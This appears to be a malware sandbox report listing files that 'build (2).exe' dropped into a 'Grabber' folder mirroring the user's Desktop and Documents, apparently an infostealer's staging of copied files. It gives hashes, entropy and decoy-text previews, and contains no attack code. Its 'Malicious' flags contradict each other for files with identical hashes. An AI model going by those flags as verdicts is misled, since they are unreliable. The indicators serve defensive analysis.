Preview:	QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\NEBFQQYWPS.png

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\QCFWYSKMHA.png

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702247102869977
Encrypted:	false
SSDEEP:	24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5:	B734D7226D90E4FD8228EE89C7DD26DA
SHA1:	EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256:	ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512:	D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious:	false
Preview:	QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL.pdf

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	true
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\UOOJJOZIRH.docx

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694311754777018
Encrypted:	false
SSDEEP:	24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
MD5:	61908250A5348CC047FF15260F730C2B
SHA1:	CBCF34156EAE25B328A926E21008598EE8D1CBDE
SHA-256:	8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
SHA-512:	BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
Malicious:	false
Preview:	UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\UOOJJOZIRH\IPKGELNTQY.jpg

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	true
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\UOOJJOZIRH\MXPXCVPDVN.xlsx

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\UOOJJOZIRH\NEBFQQYWPS.png

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\UOOJJOZIRH\SFPUSAFIOL.pdf

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\UOOJJOZIRH\UOOJJOZIRH.docx

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694311754777018
Encrypted:	false
SSDEEP:	24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
MD5:	61908250A5348CC047FF15260F730C2B
SHA1:	CBCF34156EAE25B328A926E21008598EE8D1CBDE
SHA-256:	8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
SHA-512:	BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
Malicious:	false
Preview:	UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Documents\GAOBCVIQIJ.jpg

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	false
